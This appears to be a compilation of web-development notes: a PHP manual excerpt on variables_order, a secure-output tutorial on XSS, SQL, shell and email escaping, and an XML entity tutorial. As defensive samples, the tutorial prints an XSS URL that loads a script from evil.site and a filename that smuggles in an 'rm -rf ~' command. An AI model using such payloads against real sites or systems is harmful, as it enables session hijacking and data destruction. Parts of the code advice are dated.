junecnol:

variables_order string

Sets the order of the EGPCS (Environment, Get, Post, Cookie, and Server) variable parsing. For example, if variables_order is set to "SP" then PHP will create the superglobals $_SERVER and $_POST, but not create $_ENV, $_GET, and $_COOKIE. Setting to "" means no superglobals will be set.

If the deprecated register_globals directive is on, then variables_order also configures the order in which the ENV, GET, POST, COOKIE and SERVER variables are populated in global scope. So for example if variables_order is set to "EGPCS", register_globals is enabled, and both $_GET['action'] and $_POST['action'] are set, then $action will contain the value of $_POST['action'] as P comes after G in our example directive value.

Warning

In both the CGI and FastCGI SAPIs, $_SERVER is also populated by values from the environment; S is always equivalent to ES regardless of the placement of E elsewhere in this directive.

Note:

The content and order of $_REQUEST is also affected by this directive.

Lazycat.org PHP Tips

Safer PHP output

Most PHP scripts produce output of some kind. When you produce that output, you need to make sure that your output is properly escaped, whether you’re making an HTML page, an XML file or a JSON feed. PHP can’t do this automatically, so you need to know what output escaping is, and how, when and why to do it.

To understand output escaping, it’s useful to know how HTML works. The M stands for Mark-up; in other words, an HTML file contains both content and commands. The commands mark up sections of content – as headings, bold text, or scripts – or they embed special characters, images, or scripts. To separate content and commands, HTML reserves three characters: <, >, and &. HTML tags are wrapped with the < and > characters, which means you can’t use them for anything else.

So what if you want to write < or > in your content? You need to use HTML entities. These are commands that embed special characters. Specifically these four entities:

Character   Entity name    Entity code
<           Less-than      &lt;
>           Greater-than   &gt;
&           Ampersand      &amp;
"           Double-quote   &quot;

There are about 250 other named entities (and numeric ones too), but if you use UTF-8 these are the only four HTML entities you’ll ever need.

So when you output into an HTML page with PHP, you need to convert <, >, and & in your output into the HTML entities for those characters, otherwise you’ll either trip up the parser (breaking your layout), or worse, insert HTML commands where you don’t mean to. There’s a whole class of attacks that exploit non-escaped output: they’re called cross-site scripting attacks (or XSS for short; CSS was already taken!)

The anatomy of an XSS attack

Here’s a terrible script:

<?php $name = $_GET['name']; echo "Hi $name!";

It’s terrible for two reasons: the first is that the input isn’t filtered. You can read about doing that here. The second is that the output isn’t escaped. This means that someone can create a URL like http://example.com/yourscript.php?name=<script src="http://evil.site/evil.js"></script> and then send that URL to someone else.

When they click on it, the remote script is run on your page in the visitor’s web browser. It has access to everything that visitor does on your site. If they’re logged in, then that script can steal or set cookies (allowing an attacker to hijack a login session), it can perform actions using the visitor’s login (like ordering a product to a different address, creating a new user, etc – this is a sub-class of attack called “Cross site request forgery”). It can change the HTML of your page to add forms and links that ask for personal and financial details. In short, it’s bad news. But it’s also easy to avoid.

Basic HTML escaping

The first thing to do is to filter your input. Names will never need to contain HTML tags, so you can use the FILTER_SANITIZE_STRING filter, which removes HTML and PHP tags (note that this filter is deprecated as of PHP 8.1). The second thing to do is to escape your output using the htmlspecialchars() function. Either approach will help on its own, but you should always use both.

<?php $name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_STRING); echo 'Hi '. htmlspecialchars($name, ENT_COMPAT, 'UTF-8');
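To see what the escaping step alone buys you, here is a minimal sketch that feeds the attack payload from the previous section through htmlspecialchars(). The hard-coded $name is a stand-in for the request parameter, so the snippet can be run from the command line.

```php
<?php
// Hypothetical hostile value, standing in for $_GET['name'].
$name = '<script src="http://evil.site/evil.js"></script>';

// Escaping at output time turns the markup into inert text.
$safe = htmlspecialchars($name, ENT_COMPAT, 'UTF-8');

echo 'Hi ' . $safe . "!\n";
// Hi &lt;script src=&quot;http://evil.site/evil.js&quot;&gt;&lt;/script&gt;!
```

The browser displays the tag as text instead of loading the remote script.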

htmlentities vs htmlspecialchars

There are two functions in PHP that will do HTML escaping: htmlentities() and htmlspecialchars(). If you’re outputting HTML or XML in UTF-8 (and unless you have a good reason not to, you should), then the latter’s all you need. If you’re producing XML you pretty much have to use htmlspecialchars(), because hardly any of the entities produced by htmlentities() exist in XML (unless you declared them yourself).

Notice that you need to specify the output character set. If you don’t, the function will use the default character set (ISO-8859-1 before PHP 5.4, which covers some western European languages like English; UTF-8 from PHP 5.4 onwards), and if that default doesn’t match your data, other special characters will be mangled or removed entirely. If you’ve never heard about character sets before, you’re probably from a native English-speaking country, and you don’t know how annoying they were until Unicode came along. The good news is that for pretty much anything you’d want to do in PHP, using UTF-8 will deal with all those nasty little problems.

The other parameter in the htmlspecialchars() call is ENT_COMPAT. I’ve used that because it’s a safe default: it will also escape double-quote characters ". You only really need to do that if you’re outputting inside an HTML attribute (like <img src="<?php echo htmlspecialchars($img_path, ENT_COMPAT, 'UTF-8'); ?>">). You could use ENT_NOQUOTES everywhere else. Note that ENT_COMPAT leaves single quotes alone, so it only protects attributes that are wrapped in double quotes. While I’ve got your ear: I know that technically you can use single-quotes in HTML 4 attributes (<br clear='all'>), but don’t. It’s horrible.
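As a rough illustration of how the quote flags differ, this sketch runs one made-up string through three flag settings. ENT_QUOTES isn’t discussed above; it’s the standard PHP flag that escapes single quotes as well, and is included here only for comparison.

```php
<?php
// Sample text containing every character the flags care about.
$text = 'Tom & "Jerry" aren\'t <b>bold</b>';

$compat   = htmlspecialchars($text, ENT_COMPAT, 'UTF-8');   // escapes " but not '
$noquotes = htmlspecialchars($text, ENT_NOQUOTES, 'UTF-8'); // leaves both quote types alone
$quotes   = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');   // escapes both " and '

echo $compat, "\n";   // Tom &amp; &quot;Jerry&quot; aren't &lt;b&gt;bold&lt;/b&gt;
echo $noquotes, "\n"; // Tom &amp; "Jerry" aren't &lt;b&gt;bold&lt;/b&gt;
echo $quotes, "\n";   // Tom &amp; &quot;Jerry&quot; aren&#039;t &lt;b&gt;bold&lt;/b&gt;
```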

When to escape output

You might be tempted to escape variables when you load them in. Something like:

<?php $name = htmlspecialchars(filter_input(INPUT_GET, 'name'), ENT_COMPAT, 'UTF-8');

Don’t do this. Escape output when you’re outputting, not before. Escaping output depends on the kind of output you’re producing. What if you want to make a CSV file later? Or a JSON response to an AJAX script? Both need different kinds of escaping, and seeing a load of &lt;s in your Excel sheet isn’t going to improve your day.
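A small sketch of why escaping belongs at the point of output: the same raw value needs different treatment for an HTML page and for a JSON response. The value and the array key are made up for the example.

```php
<?php
// Keep the raw value around; escape it separately for each output format.
$name = 'Tom & "Jerry"';

// For an HTML page: entities.
$asHtml = htmlspecialchars($name, ENT_COMPAT, 'UTF-8');

// For a JSON response: backslash escapes, and no entities at all.
$asJson = json_encode(['name' => $name]);

echo $asHtml, "\n"; // Tom &amp; &quot;Jerry&quot;
echo $asJson, "\n"; // {"name":"Tom & \"Jerry\""}
```

Had $name been HTML-escaped when it was loaded, the JSON consumer would have received &amp; and &quot; as literal text.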

Also if you’re coding well, the code that does stuff will be separate from the code that shows stuff on screen, and you’ll be able to tell just by looking at your template whether your output has been escaped, instead of needing to trace a variable back all the way through your code.

Other forms of output escaping

XML

Many XML libraries (like the built-in SimpleXML, DOMDocument and XMLWriter) will handle escaping for you; check first though, double-escaping is embarrassing, but not escaping at all can be deadly.

Javascript

PHP doesn’t have a built-in way to escape Javascript, but you can cheat and use the json_encode() function. There are some important caveats:

  1. Make sure your output is a string. json_encode() does much more than just string conversion.
  2. JSON is always UTF-8, so make sure the page you’re embedding it in is too.
  3. If you’re setting a Javascript variable which will then be displayed as HTML, you need to use htmlspecialchars() and json_encode().
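Here is one way the json_encode() trick might look when the value is embedded in an inline script block. The JSON_HEX_* flags are an addition not mentioned above: they are standard json_encode() options that replace <, >, &, ' and " with \u escapes, so the string cannot close the surrounding script tag. The variable names are illustrative.

```php
<?php
// Hypothetical hostile value that tries to break out of the <script> block.
$name = '</script><script>alert("x")</script>';

// Cast to string (caveat 1) and ask for hex escapes of HTML-significant characters.
$flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
$jsLiteral = json_encode((string) $name, $flags);

// The result is a complete, quoted Javascript string literal.
echo "<script>var name = $jsLiteral;</script>\n";
```

Because json_encode() adds the surrounding quotes itself, the template must not wrap the value in quotes again.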

A better idea is to use the Zend Escaper component from the Zend Framework. It’s available as a Composer package so it’s easy to install and easier to use:

<?php use Zend\Escaper\Escaper; $escaper = new Escaper('UTF-8'); echo $escaper->escapeJs($name);

As with json_encode(), if you’re outputting a javascript string which will wind up as HTML on a page somewhere, you should escape the HTML too:

<?php echo $escaper->escapeJs( $escaper->escapeHtml($name) );

If you’re using Twig templates (they’re fantastic, by the way; highly recommended), then you can escape javascript safely like this:

{{ name | e('js') }}

Database (SQL)

You can escape SQL, but there’s a much better alternative, which is to use so-called “parameterised queries”. Most databases support these. In a parameterised query, you put placeholders in your SQL command where the data would normally go and then send the data separately, so there’s never a chance that data can be mis-interpreted as a command (a class of attack known as “SQL injection”). The database (or database library) will safely combine the command and data itself. Prepared SQL statements with placeholders are safer than constructing the full SQL command yourself, and can be much quicker (especially if it’s a statement that’ll be run multiple times).
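A minimal sketch of a parameterised query using PDO. It assumes the pdo_sqlite extension is available and uses an in-memory SQLite database so that it runs without any setup; the table and column names are invented for the example.

```php
<?php
// In-memory database, so the example leaves nothing behind.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');

// A value that would wreck a query built by string concatenation.
$hostile = "Robert'); DROP TABLE users;--";

// The SQL command contains only a placeholder; the data travels separately.
$insert = $pdo->prepare('INSERT INTO users (name) VALUES (:name)');
foreach (['Alice', $hostile] as $name) {
    $insert->execute([':name' => $name]); // the statement is prepared once and reused
}

$select = $pdo->prepare('SELECT COUNT(*) FROM users WHERE name = :name');
$select->execute([':name' => $hostile]);
$matches = (int) $select->fetchColumn();

$total = (int) $pdo->query('SELECT COUNT(*) FROM users')->fetchColumn();
echo "matches: $matches, total: $total\n"; // matches: 1, total: 2
```

The hostile string is stored and matched as plain data, and the table is still there afterwards.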

SQL injection attacks are among the worst kind of website security hole; they’re easy to discover, easy to exploit, and the potential for damage is tremendous, especially if your database isn’t properly secured.

I’ve got a separate article about using prepared statements in PDO and the Doctrine DBAL (which extends it). If you’re not using one of these (or something that builds on them, like Doctrine ORM or Laravel’s Eloquent ORM if you still think ActiveRecord is cool), then you’re crazy.

Command-line tools

Obviously the potential for mischief when you expose the command-line to the web via your script is pretty bad. If you can possibly avoid it (and most likely you can), then do. If you must, then use escapeshellarg() on each argument you pass to exec(), system() or the backtick operator.
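As a sketch of what escapeshellarg() does, the snippet below builds a command string without running it. The filename is a made-up hostile value, and the output shown in the comment is what a Unix-like system produces; Windows quoting differs.

```php
<?php
// Hypothetical user-supplied value that tries to smuggle in a second command.
$filename = 'my file; rm -rf ~';

// escapeshellarg() wraps the value in quotes so the shell sees a single argument.
$command = 'ls -l ' . escapeshellarg($filename);

echo $command, "\n"; // on Unix-like systems: ls -l 'my file; rm -rf ~'
```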

Among the Symfony Process component‘s many nifty features, its ProcessBuilder class will automatically prepare and escape a command for you:

<?php use Symfony\Component\Process\ProcessBuilder; $builder = new ProcessBuilder(array('ls', '-lsa')); $builder->getProcess()->run();

Email

If you don’t properly escape output for email headers, a moderately clever attacker can hijack the entire message and replace it with one of their own, sent to whoever they like. The easy way to avoid this is not to use PHP’s built-in mail() function at all, and instead use something like Swiftmailer or Zend Mail:

<?php
// Zend Mail
use Zend\Mail;

$mail = new Mail\Message();
$mail->setBody('This is the text of the email.');
$mail->setFrom('web@example.org', 'My site');
$mail->addTo('recipient@example.com', 'Their name');
$mail->setSubject('Test Subject');

$transport = new Mail\Transport\Sendmail();
$transport->send($mail);

// Swift Mailer
$message = Swift_Message::newInstance();
$message->setFrom(array(
    'web@example.org' => 'My site',
));
$message->setTo(array(
    'recipient@example.com' => 'Their name',
));
$message->setSubject('My subject');
$message->setBody('Hello world', 'text/plain');

$transport = Swift_MailTransport::newInstance();
$mailer = Swift_Mailer::newInstance($transport);
$mailer->send($message);

Both Zend Mail and Swift Mailer offer huge advantages over the plain mail() function; for example they can handle attachments, easy HTML email, inline images and encrypted mail server connections, so safe output escaping is only one good reason to use them.

Printing HTML

It’s bad form to write PHP that writes HTML: it’s harder to update your page layout, and it’s harder to correctly escape your output. So avoid this:

<?php echo "<a href=\"$url\">$name</a>"; ?>

And instead do this:

<a href="<?php echo htmlspecialchars($url, ENT_COMPAT, 'utf-8'); ?>"> <?php echo htmlspecialchars($name, ENT_NOQUOTES, 'utf-8'); ?> </a>

If you’re thinking that looks long, ugly and verbose, then … well, you’re right. Use Twig instead, and you’ll get a cleaner separation of code and templates, manual and automatic output escaping, and template inheritance that can really reduce the amount of work needed to update your site.

Installing Twig

Installing and setting up Twig is easy with the Composer PHP package manager. Download it by running this from your command-line:

Then create a composer.json file:

{ "require": { "twig/twig": "~1.12" } }

Install Twig into a new (or existing) vendor/twig folder with:

php composer.phar install

Twig setup

It’s good practice to keep most of your code, templates and libraries out of your website’s root folder. Ideally something like:

  • myproject/

    • cache/ – compilation caches, other temporary files
    • src/ – most of your code should go here
    • templates/ – Twig templates
    • test/ – your test suite
    • vendor/ – 3rd party libraries managed by Composer
    • web/ – the website root folder
      • images/
      • js/
      • css/
      • etc…

Put most of your code in src/, and place just enough code in web/ to load and run that code. For the sake of a short example though, here’s a basic web/example.php and templates/index.twig:


<?php
require __DIR__.'/../vendor/autoload.php';

$loader = new Twig_Loader_Filesystem(__DIR__.'/../templates');
$twig = new Twig_Environment($loader, array(
    // Uncomment the line below to cache compiled templates
    // 'cache' => __DIR__.'/../cache',
));

$name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_STRING);
if (!$name) {
    $name = "Mercury, Venus, Mars, Jupiter, Saturn, Uranus & Neptune.";
}

echo $twig->render('index.twig', array(
    'name' => $name,
));

<!DOCTYPE html>
 
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>Twig test</title>
</head>
<body>
<h1>Hello world</h1>
<p>And hello {{ name }}</p>
</body>
</html>

Twig’s easy to learn and use, and tremendously powerful. Read the documentation to get started.


Feedback

Please send me corrections; I know someone’s always wrong on the internet, and I’d appreciate knowing if it’s me.

It should go without saying, but any example code shown on this site is yours to use without obligation or warranty of any kind. As far as it’s possible to do so, I release it into the public domain.

ENTITY

 

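1) What an entity is

- In the dictionary sense, an entity is something that exists in its own right, or an independent object. The XML Recommendation defines it as a physical storage unit that makes up an XML document.

- A ~.xml file is called the document entity, and an external DTD subset document is called the external DTD subset entity (XML Recommendation).

- The document entity is the basic physical storage unit of an XML document. Every XML document must have exactly one document entity.

- Including the document entity, the following eight kinds of entity are defined (XML Recommendation):

  Document entity
  External DTD subset entity
  Built-in entity
  Internal general parsed entity
  External general parsed entity
  External general unparsed entity
  Internal parameter entity
  External parameter entity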

 

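2) What entities are for

- XML documents are divided into storage units (entities) to make their content more reusable.

- Consider writing the same content in a particular part of several XML documents. Typing it out by hand each time is slow and invites typos, and if part of that content later changes, every XML document has to be edited one by one. In that case, you can create a single external general parsed entity that holds just the shared content, and have each XML document reference it.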

 

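3) Classifying entities

- By whether a physical storage unit exists. Depending on whether or not the entity exists as a file, its name takes one of the following prefixes:

  Prefix     Physical storage unit
  Internal   None; the entity is declared with specific content inside the DTD
  External   Exists as a file

- By where the entity is used:

  Entity name   Where it is referenced
  General       Referenced from within an XML document
  Parameter     Referenced from within a DTD

- By whether the entity consists of character data that an XML parser can parse:

  Entity name   Content
  Parsed        Character data that the XML parser can interpret
  Unparsed      Non-character data that the XML parser cannot interpret; typical unparsed entities are image, music and video files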

 

4) Built-in entities

- Built-in entities are predefined, so they can be used in XML without any separate entity declaration.

  Reference in XML   Replaced by   Meaning
  &lt;               <             less-than
  &gt;               >             greater-than
  &amp;              &             ampersand
  &quot;             "             double-quote
  &apos;             '             single-quote
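Tying this back to the PHP article above: as a rough sketch, htmlspecialchars() can produce all five of these built-in entity references when it is given the ENT_XML1 and ENT_QUOTES flags. The sample string is made up for the example.

```php
<?php
// Text containing all five characters that have built-in XML entities.
$text = '<a & b> "q" \'r\'';

// ENT_XML1 selects XML rules; ENT_QUOTES adds escaping of single quotes.
$xmlSafe = htmlspecialchars($text, ENT_QUOTES | ENT_XML1, 'UTF-8');

echo $xmlSafe, "\n"; // &lt;a &amp; b&gt; &quot;q&quot; &apos;r&apos;
```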

 

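5) Internal general parsed entities

- An internal general parsed entity is declared inside the DTD with specific character data as its value, so it has no physical storage unit of its own (no file). It can be declared anywhere in the DTD; by convention it goes directly below the text declaration.

  Declaration:  <!ENTITY entity-name "replacement character data">
  Reference:    &entity-name;

Internal general parsed entity example)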

ch3_1201.dtd

<?xml version="1.0" encoding="utf-8" ?>

<!-- Internal general entities -->
<!ENTITY kr "Korea">
<!ENTITY fr "France">
<!ENTITY us "USA">

<!ELEMENT booklist (book*)>
<!ELEMENT book (title, author, nation)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT nation (#PCDATA)>

<!ATTLIST author nation CDATA #IMPLIED>

ch3_1201.xml

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE booklist SYSTEM "ch3_1201.dtd">

<booklist>
    <book>
        <title>Superman</title>
        <author>Someone</author>
        <nation>&fr;</nation>
    </book>
    <book>
        <title>Batman</title>
        <author nation="&kr;">Me</author>
        <nation>&us;</nation>
    </book>
</booklist>
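To watch the substitution happen, here is a minimal sketch using PHP’s DOMDocument. To stay self-contained it declares the entities in an internal DTD subset inside the document rather than in a separate .dtd file, which is a simplification of the example above. LIBXML_NOENT asks the parser to replace entity references with their values; it is best avoided on untrusted XML, since entity expansion is a known attack vector.

```php
<?php
// A cut-down booklist with the entities declared in an internal subset.
$xml = <<<'XML'
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE booklist [
  <!ENTITY fr "France">
  <!ENTITY us "USA">
]>
<booklist>
  <book><title>Superman</title><nation>&fr;</nation></book>
  <book><title>Batman</title><nation>&us;</nation></book>
</booklist>
XML;

$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT); // substitute entity references while parsing

// Collect the text of every <nation> element.
$nations = [];
foreach ($doc->getElementsByTagName('nation') as $node) {
    $nations[] = $node->textContent;
}

echo implode(', ', $nations), "\n"; // France, USA
```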

 

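6) External general parsed entities

- The file does not have to use the .xml extension; any other name works.

- It can be declared anywhere in the DTD; by convention it goes directly below the text declaration. The general form is:

  <!ENTITY entity-name SYSTEM "URI of the external general parsed entity">

  For example:

  <!ENTITY entity-name SYSTEM "external-general-parsed-entity-file-name">
  <!ENTITY entity-name SYSTEM "http://web-server-address/path/…/external-general-parsed-entity-name">

- It is referenced with: &entity-name;

External general parsed entity example)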

ch3_1201_1.xml

<?xml version="1.0" encoding="utf-8" ?>

<kinds>
    <kind id="k1">Novel</kind>
    <kind id="k2">Essay</kind>
    <kind id="k3">Computers</kind>
</kinds>

ch3_1202.dtd

<?xml version="1.0" encoding="utf-8" ?>

<!ENTITY kind SYSTEM "ch3_1201_1.xml">  <!-- Pull in the kinds defined in that file. -->
<!ELEMENT booklist (kinds, book*)>
<!ELEMENT kinds (kind*)>
<!ELEMENT kind (#PCDATA)>

<!ELEMENT book (title, author)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>

<!ATTLIST kind id ID #REQUIRED>
<!ATTLIST book id ID #REQUIRED
               kind IDREF #REQUIRED>

ch3_1202.xml

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE booklist SYSTEM "ch3_1202.dtd">

<booklist>
    &kind;
    <book id="b1" kind="k1">
        <title>Haha</title>
        <author>LOL</author>
    </book>
    <book id="b2" kind="k3">
        <title>XML</title>
        <author>홍길동</author>
    </book>
</booklist>

 

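7) External general unparsed entities

- These are storage units made up of non-character data.

- Music files, image files, video files and the like belong here.

- To reference an external general unparsed entity from an XML document, a NOTATION declaration is needed in the DTD.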

 

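8) Internal parameter entities

- A part of a DTD that is used repeatedly can be declared once as an internal parameter entity. Elsewhere in the DTD you then reference the entity name instead of repeating the code, with the same effect as writing it out directly.

  <!ENTITY % entity-name "part of the DTD content to substitute">

- The declaration must come before the first reference to it. By convention it goes directly below the text declaration.

- In the declaration, the % must have whitespace both before and after it.

- Inside the DTD, an internal parameter entity is referenced with: %entity-name;

Internal parameter entity example)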

ch3_1203.dtd

<?xml version="1.0" encoding="utf-8" ?>

<!-- Internal parameter entity -->
<!ENTITY % maninfo "(name, age, tel)">

<!ELEMENT members (chief|manager|waiter)*>
<!ELEMENT chief %maninfo;>
<!ELEMENT manager %maninfo;>
<!ELEMENT waiter %maninfo;>

<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT tel (#PCDATA)>

ch3_1203.xml

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE members SYSTEM "ch3_1203.dtd">

<members>
    <chief>
        <name>홍길동</name>
        <age>20</age>
        <tel>111-1111</tel>
    </chief>
    <manager>
        <name>임꺽정</name>
        <age>22</age>
        <tel>122-1111</tel>
    </manager>
    <waiter>
        <name>이순신</name>
        <age>21</age>
        <tel>221-1111</tel>
    </waiter>
</members>

 

 

9) External parameter entities

  <!ENTITY % entity-name SYSTEM "URI of the external parameter entity">

External parameter entity example)

ch3_1204_1.dtd

<?xml version="1.0" encoding="utf-8" ?>

<!ENTITY % maninfo "(name, age, tel)">

<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT tel (#PCDATA)>

ch3_1204.dtd

<?xml version="1.0" encoding="utf-8" ?>

<!-- Declare the external parameter entity -->
<!ENTITY % maninfo_element SYSTEM "ch3_1204_1.dtd">

<!-- Reference the external parameter entity -->
%maninfo_element;

<!ELEMENT members (chief|manager|waiter)*>
<!ELEMENT chief %maninfo;>
<!ELEMENT manager %maninfo;>
<!ELEMENT waiter %maninfo;>